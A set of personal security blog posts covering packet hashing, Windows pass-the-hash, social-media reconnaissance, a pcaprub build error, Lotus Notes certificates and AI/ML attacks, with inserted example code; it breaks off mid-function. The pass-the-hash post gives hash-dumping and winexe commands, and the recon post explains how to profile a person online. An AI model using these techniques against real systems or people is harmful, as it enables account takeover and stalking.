
Brand New Day


It’s a brand new day with no novelty! Back to the lab today, trying to get access to the packet data so I can calculate the hash values. Inside the kernel’s sk_buff structure (the buffer a netfilter hook receives) there is an unsigned char *data field, and this is probably exactly what I need to compute the hashes over. There’s this awesome link which has great information about the sk_buff structure. The unsigned int len field holds the size of the packet from the point data points at, including the headers; in the NF_INET hooks data points at the IP header, so len covers the IP header, the transport header (TCP / UDP / ICMP) and the payload. One caveat before indexing data[0..len-1]: len also counts bytes that live in paged fragments, so the linear area can be shorter than len. Call skb_linearize() first (or read through skb_header_pointer()) and check skb_headlen() rather than assuming the whole packet is contiguous. Assuming the data is contiguous and we hash it in fixed-size chunks, the following algorithm could be used:

no_of_chunks = len / BYTE_SIZE_FOR_SIGN;

addendum = len % BYTE_SIZE_FOR_SIGN;

/* full chunks: hashRabin(data, first_index, last_index, seed), last_index inclusive */
for (int i = 0; i < no_of_chunks; i++)
{
    storeInTable(hashRabin(data, i*BYTE_SIZE_FOR_SIGN,
                           (i+1)*BYTE_SIZE_FOR_SIGN - 1, 0));
}

/* the short tail, only if len is not a multiple of the chunk size */
if (addendum > 0)
{
    storeInTable(hashRabin(data, no_of_chunks*BYTE_SIZE_FOR_SIGN,
                           no_of_chunks*BYTE_SIZE_FOR_SIGN + addendum - 1, 0));
}
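The chunking above, worked through end to end in user space as an added example (this is not the post’s kernel code). The page never shows hashRabin() or storeInTable(), so a Rabin-Karp style polynomial hash with assumed parameters stands in for the former and a plain list for the latter; a constructed byte string plays the packet that skb->data / skb->len would provide after skb_linearize():

```python
"""Chunked hashing of a packet buffer, in the shape of the sketch above.

Added example, not the post's own code. hashRabin() and storeInTable()
are not shown on the page, so a Rabin-Karp style polynomial hash
(assumed parameters) stands in for the former and a list for the latter.
In the kernel `data` and `len` would be skb->data / skb->len after
skb_linearize(); here a constructed byte string plays the packet.
"""

BYTE_SIZE_FOR_SIGN = 8          # chunk size in bytes (assumed value)
_BASE = 257                     # polynomial base (assumed)
_MOD = (1 << 61) - 1            # Mersenne prime modulus (assumed)


def hash_rabin(data: bytes, first: int, last: int) -> int:
    """Polynomial hash of data[first..last], both indices inclusive, the
    same (start, end) convention the loop above uses."""
    if not 0 <= first <= last < len(data):
        raise IndexError(f"chunk [{first}, {last}] lies outside a {len(data)}-byte buffer")
    h = 0
    for b in data[first:last + 1]:
        h = (h * _BASE + b) % _MOD
    return h


def chunk_hashes(data: bytes) -> list:
    """Hash each full BYTE_SIZE_FOR_SIGN-byte chunk, then the short tail if
    there is one.  Returns the 'table' as a list of (offset, length, hash)."""
    length = len(data)
    no_of_chunks = length // BYTE_SIZE_FOR_SIGN
    addendum = length % BYTE_SIZE_FOR_SIGN
    table = []
    for i in range(no_of_chunks):
        first = i * BYTE_SIZE_FOR_SIGN
        last = (i + 1) * BYTE_SIZE_FOR_SIGN - 1
        table.append((first, BYTE_SIZE_FOR_SIGN, hash_rabin(data, first, last)))
    if addendum:                            # len % chunk == 0 means there is no tail
        first = no_of_chunks * BYTE_SIZE_FOR_SIGN
        last = first + addendum - 1         # inclusive end index of the tail
        table.append((first, addendum, hash_rabin(data, first, last)))
    return table


if __name__ == "__main__":
    # Constructed 20-byte "packet": a 4-byte header-like prefix, 12 bytes of payload, a 4-byte tail
    packet = bytes.fromhex("45000014") + b"A" * 12 + b"TAIL"
    for offset, n, h in chunk_hashes(packet):
        print(f"offset {offset:3d}  len {n:2d}  hash {h:016x}")
```

One design point worth keeping in mind: with fixed offsets, a one-byte shift in the payload changes every chunk hash after it, so matching the same content across packets of different framing does not work. Rabin fingerprints are usually used the other way round, as a rolling hash that picks content-defined chunk boundaries, which is immune to that shift.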


These are my initial thoughts; let’s see how it works out!

-Rajat.
Rajat’s Homepage


Pass the hash


In a pen test, it’s always a race to the finish: either you get to domain admin or r00t, or you die tryin’! 🙂 But thanks to some real l33t fu by Hernan Ochoa, this has been made easy for you.
The key to pass-the-hash attacks is that Windows NTLM authentication proves identity with the password hash, not the password: the client never sends the password, it uses the NT hash (and historically the LM hash) as the key for the challenge-response computation. Whoever holds the hash can authenticate as that user, and as long as the right hash is loaded in the logon session, you are who you say you are.
Hernan Ochoa’s Pass-the-Hash Toolkit (http://oss.coresecurity.com/projects/pshtoolkit.htm) is precisely the tool for that. Once you gain local admin rights on a box, run the whosthere.exe utility on it to list the logon sessions and their LM/NT hashes. Mind you, whosthere.exe needs the right addresses inside lsasrv.dll for the Windows version and patch level you are on, and those are passed as parameters. So the first thing to do is go to C:\WINDOWS\system32, copy lsasrv.dll onto your local machine and open it in IDA Pro. The pass-the-hash source tarball ships an IDA Pro script, passthehash.idc, that you run against the open file; it gives you the addresses to pass to whosthere.exe:
whosthere.exe -a -o outputfile.txt

Once you have the hash you can either use iam.exe from the same toolkit (it swaps the hash into your current logon session on the Windows box), or, from Linux, winexe (http://eol.ovh.org/winexe/) with the pass-the-hash patch from JoMo-Kun (http://www.foofus.net/jmk/tools/winexe), or samba with the same pass-the-hash patch.
Set the SMBHASH environment variable to the hash in LMHASH:NTHASH form, for example

export SMBHASH="92D887C9910492C3254E2DF489A880E4:7A2EDE4F51B94203984C6BA21239CF63"

Then run winexe as

./winexe -U "Domain\\Username" //192.168.0.1 "cmd.exe"

Of course, you can also spend time cracking the LM hashes to get the actual passwords, but it isn’t necessary: the hash is the credential. (Where LM hashes are disabled, the LM half is the fixed empty-password value AAD3B435B51404EEAAD3B435B51404EE and only the NT half matters.)
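To make concrete why the hash alone is enough, here is the NTLMv2 challenge-response computed on both sides, as an added example that is not from the post or from the pass-the-hash toolkit. It follows the NTLMv2 computation from MS-NLMP: the client needs only the NT hash (the second half of the SMBHASH value above), never the password, and the server verifies with that same stored hash. The challenges, timestamp, target info, user and domain names are constructed placeholders:

```python
"""NTLMv2 challenge-response computed from the NT hash alone.

Added example, not from the post or from the pass-the-hash toolkit.  It
follows the NTLMv2 computation in MS-NLMP: the client never touches the
password, only NTOWF (the NT hash), which is exactly the second half of the
SMBHASH value above.  Server challenge, client challenge, timestamp and
target info are constructed values; user and domain names are placeholders.
"""
import hmac
import hashlib
import struct


def parse_smbhash(smbhash: str) -> tuple:
    """Split the 'LMHASH:NTHASH' string the patched winexe/samba read from SMBHASH."""
    lm_hex, nt_hex = smbhash.split(":")
    lm, nt = bytes.fromhex(lm_hex), bytes.fromhex(nt_hex)
    if len(lm) != 16 or len(nt) != 16:
        raise ValueError("LM and NT hashes must be 16 bytes each")
    return lm, nt


def ntowf_v2(nt_hash: bytes, user: str, domain: str) -> bytes:
    """ResponseKeyNT = HMAC-MD5(NTHash, UTF-16LE(UPPER(user) + domain))."""
    return hmac.new(nt_hash, (user.upper() + domain).encode("utf-16-le"), hashlib.md5).digest()


def ntlmv2_response(nt_hash, user, domain, server_challenge, client_challenge, timestamp, target_info):
    """Client side: build NtChallengeResponse = NTProofStr || temp and derive the session base key."""
    key = ntowf_v2(nt_hash, user, domain)
    temp = (b"\x01\x01" + b"\x00" * 6            # Responserversion, HiResponserversion, reserved
            + struct.pack("<Q", timestamp)        # FILETIME
            + client_challenge                    # 8 bytes
            + b"\x00" * 4
            + target_info                         # AV_PAIR list as sent by the server
            + b"\x00" * 4)
    nt_proof = hmac.new(key, server_challenge + temp, hashlib.md5).digest()
    session_base_key = hmac.new(key, nt_proof, hashlib.md5).digest()
    return nt_proof + temp, session_base_key


def server_verify(stored_nt_hash, user, domain, server_challenge, nt_challenge_response) -> bool:
    """Server side: recompute NTProofStr from the stored NT hash and the received
    blob, and compare in constant time.  It has exactly the inputs the attacker has."""
    nt_proof, temp = nt_challenge_response[:16], nt_challenge_response[16:]
    key = ntowf_v2(stored_nt_hash, user, domain)
    expected = hmac.new(key, server_challenge + temp, hashlib.md5).digest()
    return hmac.compare_digest(expected, nt_proof)


# Constructed inputs: the hash pair from the post, fixed challenges, a fixed timestamp
# and a minimal AV_PAIR list (MsvAvNbDomainName "DOMAIN", then MsvAvEOL).
SMBHASH = "92D887C9910492C3254E2DF489A880E4:7A2EDE4F51B94203984C6BA21239CF63"
SERVER_CHALLENGE = bytes.fromhex("0123456789abcdef")
CLIENT_CHALLENGE = bytes.fromhex("fedcba9876543210")
TIMESTAMP = 0x01D9A1B2C3D4E5F6
TARGET_INFO = struct.pack("<HH", 0x0002, 12) + "DOMAIN".encode("utf-16-le") + struct.pack("<HH", 0, 0)


def authenticate_with_hash_only(user="Username", domain="Domain") -> bool:
    """Run both sides; True means the server accepted a client that never had the password."""
    _lm, nt = parse_smbhash(SMBHASH)
    response, _key = ntlmv2_response(nt, user, domain, SERVER_CHALLENGE,
                                     CLIENT_CHALLENGE, TIMESTAMP, TARGET_INFO)
    return server_verify(nt, user, domain, SERVER_CHALLENGE, response)


if __name__ == "__main__":
    print("server accepted hash-only client:", authenticate_with_hash_only())
```

Note that the LM half of SMBHASH is not used anywhere in this exchange: NTLMv2 (and LMv2) key everything off the NT hash, which is why cracking the LM hash buys you nothing the NT hash does not already give you.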


Modern-day Reconnaissance


Back in the day “recon” meant something different from what it means today. Today, in the age of cyber-terrorism and cyber-stalking (or Google stalking), reconnaissance draws on a variety of different sources, and tools such as mash-up applications make things quite easy for a social engineer. For the purpose of this discussion, let’s consider two entities: the “stalker” (the person seeking information about someone) and the “stalkee” (the someone whose information is being sought).
Back in the day (and man, I’m only talking about 4-5 years ago!) the only source was public forums where users posted questions from a constant email ID. You had to scour different Usenet groups and that was it … and possibly a Friendster account. Now people have Facebook profiles that can be viewed publicly. That gives us a person’s friends, which in turn gives us the stalkee’s geographical location and maybe even birthday. LinkedIn gives the stalkee’s job, and you can confirm the geographical location there as well. Now you have the person’s name and location. If you need more, such as age or birthdate, I’ve found ZabaSearch a good resource. You can get a lot of information from ZabaSearch, but if the stalkee wants to, he or she can remove it using Zaba’s block feature. I do not know how they handle that information; Zaba does have a “premium service” and I do not know whether it gives access to the “blocked records”. Now you have the stalkee’s age. You can also search Twitter for the person’s feed to see what the stalkee is doing. I came across an interesting mashup application that crawls Twitter to work out where a person is, aptly called Please Rob Me!. There are other tools such as Loopt and TripIt. Like Twitter, Google Buzz can give away a lot of information, and the best part about Buzz is that it is searchable … cool … the stalker’s job just got easier.


Pcaprub installation on Win 10 x64


If you run into the error below, the cause is that pcaprub’s build uses a hardcoded path for WinPcap: C:\WpdPack. I downloaded WinPcap 4.1.3 and the WinPcap developer’s pack and unpacked the latter to C:\WpdPack. Additionally, since this is an x64 machine, the 64-bit import libraries live in C:\WpdPack\Lib\x64 while the build links against C:\WpdPack\Lib, so the linker cannot find wpcap at all (the tell-tale in the log is “checking for pcap_open_live() in -lwpcap... no”, followed by an undefined reference for every pcap_* symbol at link time). I copied C:\WpdPack\Lib\x64\*.lib into C:\WpdPack\Lib and then the compilation worked.

You need pcaprub for things like msf (Metasploit).


C:\dev\kit>gem install pcaprub
Temporarily enhancing PATH for MSYS/MINGW...
Building native extensions. This could take a while...
ERROR: Error installing pcaprub:
ERROR: Failed to build gem native extension.

current directory: C:/Ruby24-x64/lib/ruby/gems/2.4.0/gems/pcaprub-0.13.0/ext/pcaprub_c
C:/Ruby24-x64/bin/ruby.exe -r ./siteconf20181112-2628-1wqgu6f.rb extconf.rb

[*] Running checks for pcaprub_c code...
platform is x64-mingw32
checking for -lws2_32... yes
checking for -liphlpapi... yes
checking for windows.h... yes
checking for winsock2.h... yes
checking for iphlpapi.h... yes
checking for ruby/thread.h... yes
checking for rb_thread_blocking_region()... no
checking for rb_thread_call_without_gvl()... yes
checking for pcap_open_live() in -lwpcap... no
checking for pcap_setnonblock() in -lwpcap... no
creating Makefile

current directory: C:/Ruby24-x64/lib/ruby/gems/2.4.0/gems/pcaprub-0.13.0/ext/pcaprub_c
make "DESTDIR=" clean

current directory: C:/Ruby24-x64/lib/ruby/gems/2.4.0/gems/pcaprub-0.13.0/ext/pcaprub_c
make "DESTDIR="
generating pcaprub_c-x64-mingw32.def
compiling pcaprub.c
In file included from C:/WpdPack/include/pcap/pcap.h:41,
from C:/WpdPack/include/pcap.h:45,
from pcaprub.c:11:
C:/WpdPack/include/pcap-stdinc.h:64: warning: "snprintf" redefined
#define snprintf _snprintf

In file included from C:/Ruby24-x64/include/ruby-2.4.0/ruby/ruby.h:2429,
from C:/Ruby24-x64/include/ruby-2.4.0/ruby.h:33,
from pcaprub.c:1:
C:/Ruby24-x64/include/ruby-2.4.0/ruby/subst.h:6: note: this is the location of the previous definition
#define snprintf ruby_snprintf

In file included from C:/WpdPack/include/pcap/pcap.h:41,
from C:/WpdPack/include/pcap.h:45,
from pcaprub.c:11:
C:/WpdPack/include/pcap-stdinc.h:65: warning: "vsnprintf" redefined
#define vsnprintf _vsnprintf

In file included from C:/Ruby24-x64/include/ruby-2.4.0/ruby/ruby.h:2429,
from C:/Ruby24-x64/include/ruby-2.4.0/ruby.h:33,
from pcaprub.c:1:
C:/Ruby24-x64/include/ruby-2.4.0/ruby/subst.h:7: note: this is the location of the previous definition
#define vsnprintf ruby_vsnprintf

pcaprub.c: In function 'rbpcap_each_data':
pcaprub.c:992:9: warning: cast from pointer to integer of different size [-Wpointer-to-int-cast]
fno = (int)pcap_getevent(rbp->pd);
^
pcaprub.c:992:7: warning: assignment to 'HANDLE' {aka 'void *'} from 'int' makes pointer from integer without a cast [-W
int-conversion]
fno = (int)pcap_getevent(rbp->pd);
^
pcaprub.c: In function 'rbpcap_each_packet':
pcaprub.c:1034:9: warning: cast from pointer to integer of different size [-Wpointer-to-int-cast]
fno = (int)pcap_getevent(rbp->pd);
^
pcaprub.c:1034:7: warning: assignment to 'HANDLE' {aka 'void *'} from 'int' makes pointer from integer without a cast [-
Wint-conversion]
fno = (int)pcap_getevent(rbp->pd);
^
pcaprub.c: In function 'rbpcap_thread_wait_handle':
pcaprub.c:1274:7: warning: passing argument 1 of 'rb_thread_call_without_gvl' from incompatible pointer type [-Wincompat
ible-pointer-types]
rbpcap_thread_wait_handle_blocking,
^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
In file included from pcaprub.c:4:
C:/Ruby24-x64/include/ruby-2.4.0/ruby/thread.h:28:7: note: expected 'void * (*)(void *)' but argument is of type 'VALUE
(*)(void *)' {aka 'long long unsigned int (*)(void *)'}
void *rb_thread_call_without_gvl(void *(*func)(void *), void *data1,
^~~~~~~~~~~~~~~~~~~~~~~~~~
linking shared-object pcaprub_c.so
pcaprub.o:pcaprub.c:(.text+0x1a0): undefined reference to `pcap_lib_version'
pcaprub.o:pcaprub.c:(.text+0x1e0): undefined reference to `pcap_findalldevs'
pcaprub.o:pcaprub.c:(.text+0x2b8): undefined reference to `pcap_freealldevs'
pcaprub.o:pcaprub.c:(.text+0x32f): undefined reference to `pcap_lookupnet'
pcaprub.o:pcaprub.c:(.text+0x43d): undefined reference to `pcap_close'
pcaprub.o:pcaprub.c:(.text+0x45a): undefined reference to `pcap_dump_close'
pcaprub.o:pcaprub.c:(.text+0x67c): undefined reference to `pcap_set_timeout'
pcaprub.o:pcaprub.c:(.text+0x6ce): undefined reference to `pcap_list_datalinks'
pcaprub.o:pcaprub.c:(.text+0x707): undefined reference to `pcap_datalink_val_to_name'
pcaprub.o:pcaprub.c:(.text+0x76d): undefined reference to `pcap_free_datalinks'
pcaprub.o:pcaprub.c:(.text+0x782): undefined reference to `pcap_geterr'
pcaprub.o:pcaprub.c:(.text+0x828): undefined reference to `pcap_datalink_name_to_val'
pcaprub.o:pcaprub.c:(.text+0x895): undefined reference to `pcap_set_datalink'
pcaprub.o:pcaprub.c:(.text+0x8b3): undefined reference to `pcap_geterr'
pcaprub.o:pcaprub.c:(.text+0x93f): undefined reference to `pcap_set_snaplen'
pcaprub.o:pcaprub.c:(.text+0x9d4): undefined reference to `pcap_set_promisc'
pcaprub.o:pcaprub.c:(.text+0xae1): undefined reference to `pcap_lookupnet'
pcaprub.o:pcaprub.c:(.text+0xb57): undefined reference to `pcap_compile'
pcaprub.o:pcaprub.c:(.text+0xb6d): undefined reference to `pcap_geterr'
pcaprub.o:pcaprub.c:(.text+0xb9f): undefined reference to `pcap_setfilter'
pcaprub.o:pcaprub.c:(.text+0xbaf): undefined reference to `pcap_freecode'
pcaprub.o:pcaprub.c:(.text+0xbc1): undefined reference to `pcap_geterr'
pcaprub.o:pcaprub.c:(.text+0xbe9): undefined reference to `pcap_freecode'
pcaprub.o:pcaprub.c:(.text+0xc62): undefined reference to `pcap_compile'
pcaprub.o:pcaprub.c:(.text+0xc75): undefined reference to `pcap_geterr'
pcaprub.o:pcaprub.c:(.text+0xc9d): undefined reference to `pcap_freecode'
pcaprub.o:pcaprub.c:(.text+0xccf): undefined reference to `pcap_activate'
pcaprub.o:pcaprub.c:(.text+0xd33): undefined reference to `pcap_close'
pcaprub.o:pcaprub.c:(.text+0xe0b): undefined reference to `pcap_close'
pcaprub.o:pcaprub.c:(.text+0xe43): undefined reference to `pcap_create'
pcaprub.o:pcaprub.c:(.text+0x109e): undefined reference to `pcap_close'
pcaprub.o:pcaprub.c:(.text+0x110d): undefined reference to `pcap_open_live'
pcaprub.o:pcaprub.c:(.text+0x129f): undefined reference to `pcap_open_offline'
pcaprub.o:pcaprub.c:(.text+0x1419): undefined reference to `pcap_open_dead'
pcaprub.o:pcaprub.c:(.text+0x1532): undefined reference to `pcap_dump_open'
pcaprub.o:pcaprub.c:(.text+0x15d9): undefined reference to `pcap_dump_close'
pcaprub.o:pcaprub.c:(.text+0x171e): undefined reference to `pcap_dump'
pcaprub.o:pcaprub.c:(.text+0x17e7): undefined reference to `pcap_sendpacket'
pcaprub.o:pcaprub.c:(.text+0x17fa): undefined reference to `pcap_geterr'
pcaprub.o:pcaprub.c:(.text+0x18ea): undefined reference to `pcap_setnonblock'
pcaprub.o:pcaprub.c:(.text+0x1912): undefined reference to `pcap_dispatch'
pcaprub.o:pcaprub.c:(.text+0x19fd): undefined reference to `pcap_setnonblock'
pcaprub.o:pcaprub.c:(.text+0x1a25): undefined reference to `pcap_dispatch'
pcaprub.o:pcaprub.c:(.text+0x1b35): undefined reference to `pcap_getevent'
pcaprub.o:pcaprub.c:(.text+0x1be3): undefined reference to `pcap_getevent'
pcaprub.o:pcaprub.c:(.text+0x1c91): undefined reference to `pcap_datalink'
pcaprub.o:pcaprub.c:(.text+0x1cdc): undefined reference to `pcap_major_version'
pcaprub.o:pcaprub.c:(.text+0x1d27): undefined reference to `pcap_minor_version'
pcaprub.o:pcaprub.c:(.text+0x1d72): undefined reference to `pcap_snapshot'
pcaprub.o:pcaprub.c:(.text+0x1dca): undefined reference to `pcap_stats'
collect2.exe: error: ld returned 1 exit status
make: *** [Makefile:259: pcaprub_c.so] Error 1

make failed, exit code 2

Gem files will remain installed in C:/Ruby24-x64/lib/ruby/gems/2.4.0/gems/pcaprub-0.13.0 for inspection.
Results logged to C:/Ruby24-x64/lib/ruby/gems/2.4.0/extensions/x64-mingw32/2.4.0/pcaprub-0.13.0/gem_make.out



West Coast to East Coast: antithetical US


A three-month moratorium on the blog. Things have changed dramatically in my life since I left Los Angeles, CA for New York, NY: two of the biggest cities not only in the USA but in the world.
First things first … I got a job at Ernst & Young’s Advanced Security Center, and like many people who work in New York I live in Jersey City, NJ and commute. The commute is not too bad, about 45 minutes door-to-door. Also, by living in New Jersey instead of the five boroughs (New Yorkers call Manhattan, Queens, Brooklyn, the Bronx and Staten Island the five boroughs) one saves the roughly 4% New York City income tax.
Now for the topic of this post, which is “moving” … probably the most troublesome experience people go through. It wasn’t too good for me either, but it could have been worse if not for the help of some good friends. People say you learn who your true friends are in times of adversity, and that is exactly what I found. Whereas some people came to the fore to help me in every way they could, some stayed at bay (and in some cases made sure the buoy of my life stayed in the doldrums). Well … having said that, life is but a bunch of grapes, some sweet and some sour (something I heard in the Hindi movie “Khatta Meetha”)!
Finding an apartment in the New York area can be a harrowing experience, especially on a tight budget. That is exactly what I found. The best places to look are New Jersey Craigslist and New York Craigslist. Others are Rent.com and Apartments.com, but I did not find them very useful. I found that New York had some really good places to rent even on a tight budget; all of them were in Queens (Rego Park, Forest Hills). The good part was that one could get a 2BR for $1450+ there. These places were not too far from the subway stations and had a 40-45 minute commute to Manhattan and about an hour to Long Island (on the Long Island Rail Road, aka LIRR).
Jersey City, NJ is also a very good bet, but some parts of Jersey City are posh as hell and you pay for the class. Exchange Place and Pavonia/Newport are examples (around $1700 for a 1BR). Grove Street is somewhere in between posh and not-at-all posh. Even though the prices at Exchange Place and Newport are really high, the class is well worth the money, especially when a similar apartment in Manhattan costs at least twice, maybe three times as much. Another avenue worth exploring is Hoboken, NJ. Hoboken was personally my favourite place to look, because it has a vibrancy to it: it almost looks like a European city, bustling with restaurants and young people on the streets, and it is not too far from New York. However, just like Pavonia/Newport and Exchange Place, this fun doesn’t come cheap; the rents are similar. The difference between Newport / Exchange Place and Hoboken is that the construction in Hoboken is older, and you need a realtor to get an apartment there more than you do in the former. Realtors charge a standard fee of one month’s rent for their services.
In case you are wondering what a realtor is: a realtor is a person who finds an apartment for you that fits your budget and taste. But one must be wary of realtors, because they can sometimes be a dangerous bet!
The West Coast was much easier to find apartments in, in my experience, but that may be because I was looking in a university area, which is probably easier.

-Rajat
http://rajatswarup.blogspot.com/


Lotus Notes and South Indian Names (error: Name too long)


If you are South Indian, have a long name, use Lotus Notes and want to send encrypted e-mail using Internet certificates … you may just be out of luck! Why?
Lotus Notes 6 does not support importing PKCS#12 (.pfx) certificates whose CN (Common Name), OU (Organizational Unit), O (Organization) and CA (Certification Authority) name fields together exceed 255 characters. Many of my South Indian friends have names that are 40 characters on their own! Together with the O, OU and CA fields this can easily exceed 255 characters. In that situation Lotus Notes gives a friendly error message, “Name too long”, which my friends may not find amusing at that point. Once you hit this error you cannot proceed with the import. To work around it, see whether you can reduce the characters in the OU and O fields, because the e-mail address in the certificate has to match the one in Lotus, so that part cannot be shortened.
I also found a useless response from IBM about this problem. It was pretty much “learn to deal with it; we won’t correct our stupid software”.
Justin has written a pretty useful how-to on importing S/MIME certificates into Lotus Notes.


Security Considerations in use of AI/ML


The world of Artificial Intelligence (AI) seems to be exploding with the release of ChatGPT. But as soon as the chat bot came into the public’s hands, people started finding prompts that made it sabotage its own restrictions (exploitable issues, at worst) and some weird interactions in which people had it write malware designed to stay undetected by Endpoint Detection and Response (EDR) products.

What is AI?

Very simply, Artificial Intelligence (per Wikipedia) is intelligence demonstrated by machines. Technically, it is a set of algorithms that do things a human does by making an inference, as a human would, on the basis of data that was historically provided as a “reference” for making decisions. This reference data is called training data, and the data used to test how well the algorithm arrives at a decision from that reference is called test data. Any good machine-learning course teaches how to design the data, how much of it to use for training versus testing, and the performance metrics, but that is not relevant to our discussion here. What is important is that the data you provide controls the decision-making of an artificially intelligent algorithm. This is the key difference from typical algorithms, where the code is more or less static and decides on the basis of program state: an artificially intelligent system arrives at different decisions depending on how one chooses to “train” it.

What is ML?

Machine Learning (ML) is the subset of Artificial Intelligence (AI) in which the algorithms evolve their decision-making from data that has been processed and tagged as training data. ML systems have long been used in computer security for spam classification and anomaly detection. They tend to use statistical inference to establish a baseline and flag inputs that do not fall within the norm. When operational data is fed back to train an ML-based system, one has to be careful not to incrementally shift the baseline of what is normal and what is not. Such “tilting” happens over time, and it is important to protect against drift in such systems. Some drift is fine but “bad drift” is not, and the difference is hard to predict: if some data is classified inaccurately and, accidentally or maliciously, ends up in the training set, and that inherently alters the behaviour of the model, the model becomes unreliable. The practical check is a fixed, clean hold-out set that never enters training, and a comparison of every retrained model against the previous model’s results on it before the new model is promoted.

What is Adversarial AI?

Adversarial Artificial Intelligence (AI) threats are those in which malicious actors design inputs to make models predict erroneously. There are two main kinds of attack here: a poisoning attack (the adversary controls some of the data the model is trained on) and an evasion attack (the adversary crafts an input at inference time so that the system makes a bad inference with a security consequence). The way to think about poisoning is “garbage in, garbage out”, except that it is very special garbage: data chosen to change the algorithm’s behaviour so that it returns an incorrect result when it has to make a particular decision. Evasion attacks are different in that the decision is wrong because the input looks different to the ML algorithm than it does to a human, e.g. Gaussian noise being classified as a human, or a fingerprint being matched incorrectly.
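The poisoning attack described here, and the baseline check against drift from the ML section above, as one added example that is not from the post. A multinomial naive Bayes spam filter (Laplace smoothing, no external libraries) is trained on a constructed corpus; an adversary then slips a handful of spam-looking messages labelled “ham” into the retraining data. A fixed, clean hold-out set plays the baseline, and a promotion gate rejects the retrained model whose hold-out accuracy fell. Corpus, hold-out set, poison and threshold are all constructed values:

```python
"""Poisoning a tiny spam classifier, and the baseline check that catches it.

Added example, not from the post.  A multinomial naive Bayes filter
(Laplace smoothing, no external libraries) is trained on a constructed
corpus; an adversary then slips spam-looking messages labelled 'ham' into
the retraining data.  A fixed, clean hold-out set is the baseline that a
retrained model must be compared against before it is promoted.
"""
import math
from collections import Counter

# Constructed training corpus
CLEAN_TRAINING = [
    ("free prize click now", "spam"),
    ("win free money now", "spam"),
    ("click here free offer", "spam"),
    ("cheap pills click now", "spam"),
    ("meeting tomorrow at noon", "ham"),
    ("please review the report", "ham"),
    ("lunch at noon tomorrow", "ham"),
    ("report attached for review", "ham"),
]
# Constructed hold-out set, kept out of every training run
HOLDOUT = [
    ("free money offer click", "spam"),
    ("win cheap pills now", "spam"),
    ("review the report tomorrow", "ham"),
    ("lunch meeting at noon", "ham"),
]
# The adversary's contribution: spam vocabulary, deliberately labelled ham
POISON = [("free prize click now offer", "ham")] * 6


class NaiveBayes:
    """Multinomial naive Bayes over whitespace tokens with add-one smoothing."""

    def __init__(self, labelled):
        self.docs = Counter()
        self.words = {"spam": Counter(), "ham": Counter()}
        for text, label in labelled:
            self.docs[label] += 1
            self.words[label].update(text.split())
        self.vocab = set()
        for counts in self.words.values():
            self.vocab.update(counts)
        self.total = sum(self.docs.values())

    def log_prob(self, text, label):
        lp = math.log(self.docs[label] / self.total)          # class prior
        n = sum(self.words[label].values())
        for w in text.split():
            lp += math.log((self.words[label][w] + 1) / (n + len(self.vocab)))
        return lp

    def classify(self, text):
        return max(("spam", "ham"), key=lambda c: self.log_prob(text, c))


def accuracy(model, labelled):
    return sum(model.classify(t) == label for t, label in labelled) / len(labelled)


def accept_model(candidate, baseline_accuracy, holdout=HOLDOUT, tolerance=0.05):
    """Promotion gate: reject a retrained model whose hold-out accuracy fell
    more than `tolerance` below the baseline (the 'bad drift' case)."""
    return accuracy(candidate, holdout) >= baseline_accuracy - tolerance


def demo():
    clean = NaiveBayes(CLEAN_TRAINING)
    baseline = accuracy(clean, HOLDOUT)
    poisoned = NaiveBayes(CLEAN_TRAINING + POISON)   # retrained on operational data plus poison
    probe = "free prize click now"
    return {
        "clean_verdict": clean.classify(probe),
        "poisoned_verdict": poisoned.classify(probe),
        "baseline_accuracy": baseline,
        "poisoned_accuracy": accuracy(poisoned, HOLDOUT),
        "poisoned_accepted": accept_model(poisoned, baseline),
    }


if __name__ == "__main__":
    for k, v in demo().items():
        print(f"{k}: {v}")
```

Six poisoned messages out of fourteen are enough to flip the probe from spam to ham, and they also drag down the hold-out accuracy (one of the four hold-out spams now slips through), which is what the gate catches. An adversary who can keep the hold-out accuracy flat while shifting the decision boundary elsewhere is the harder case, and the reason the hold-out set must stay secret from whoever supplies training data.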

Can we attack these systems in other ways?

In a paper by Google researchers, the authors presented a tool, TensorFuzz, with which they found several kinds of bugs in Deep Neural Networks (DNNs). So typical software attack techniques work against deep neural networks too. Fuzzing has been used for decades and has been shaking faults out of code forever. At its core, fuzzing is simple: feed the program malformed or random input until something fails. It is just that the failures in a DNN look different (a NaN propagating through the activations, a wildly wrong confidence, a crash in the numerical library), and the software that relies on the DNN for a decision must handle such failures with secure defaults rather than turning them into a security failure.
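What “secure defaults” around a model look like in practice, as an added example (this is neither TensorFuzz nor code from the post). A two-layer network with hand-picked, constructed weights scores a four-feature request as allow or deny, and a throwaway fuzzer feeds it NaN, infinities and out-of-range values. The naive decision path turns every NaN into “allow” without a trace, because every comparison against NaN is false and the argmax falls through to index 0; the hardened path refuses to decide on anything it cannot score. Weights, feature range and the edge-value list are all assumptions:

```python
"""Fuzzing the code that consumes a model's output, and failing closed.

Added example; it is neither TensorFuzz nor code from the post.  A
two-layer network with hand-picked (constructed) weights scores a
4-feature request as 'allow' or 'deny'.  A throwaway fuzzer feeds it NaN,
infinities and out-of-range values: the naive decision path turns every
NaN into 'allow' without a trace, the hardened path refuses to decide.
"""
import math
import random

# Constructed weights: 4 inputs -> 2 tanh units -> 2 logits (index 0 = allow, 1 = deny)
W1 = [[1.0, -1.0, 0.5, 0.0], [-0.5, 1.0, 0.0, 1.0]]
B1 = [0.0, 0.1]
W2 = [[1.0, -1.0], [-1.0, 1.0]]
B2 = [0.0, 0.0]
CLASSES = ("allow", "deny")


def forward(x):
    """Plain forward pass; a NaN anywhere in x propagates into both logits."""
    hidden = [math.tanh(sum(w * xi for w, xi in zip(row, x)) + b) for row, b in zip(W1, B1)]
    return [sum(w * h for w, h in zip(row, hidden)) + b for row, b in zip(W2, B2)]


def argmax(scores):
    best_i, best = 0, scores[0]
    for i, s in enumerate(scores):
        if s > best:        # every comparison against NaN is False ...
            best_i, best = i, s
    return best_i           # ... so NaN logits quietly select index 0 = 'allow'


def naive_decide(x):
    return CLASSES[argmax(forward(x))]


def hardened_decide(x):
    """Secure default: deny whenever the input or the model's output is
    outside what the model was built for, instead of guessing."""
    ok_input = (len(x) == 4 and all(isinstance(v, (int, float)) and math.isfinite(v)
                                    and 0.0 <= v <= 1.0 for v in x))
    if not ok_input:
        return "deny"
    scores = forward(x)
    if not all(math.isfinite(s) for s in scores):
        return "deny"
    return CLASSES[argmax(scores)]


def fuzz(decide, rounds=500, seed=1):
    """Corrupt one feature per round with an edge value; count the silent 'allow's."""
    rng = random.Random(seed)
    weird = [float("nan"), float("inf"), float("-inf"), 1e308, -1e308, 5.0, -3.0]
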